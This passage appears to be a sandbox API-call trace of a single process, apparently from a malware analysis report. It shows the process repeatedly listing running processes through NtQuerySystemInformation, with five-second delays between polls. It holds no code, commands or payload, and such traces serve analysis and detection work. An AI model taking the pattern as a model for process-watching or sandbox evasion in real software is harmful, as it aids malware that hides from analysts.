ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.707] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.768] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0149.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0149.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0149.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0149.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0149.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0149.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0149.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 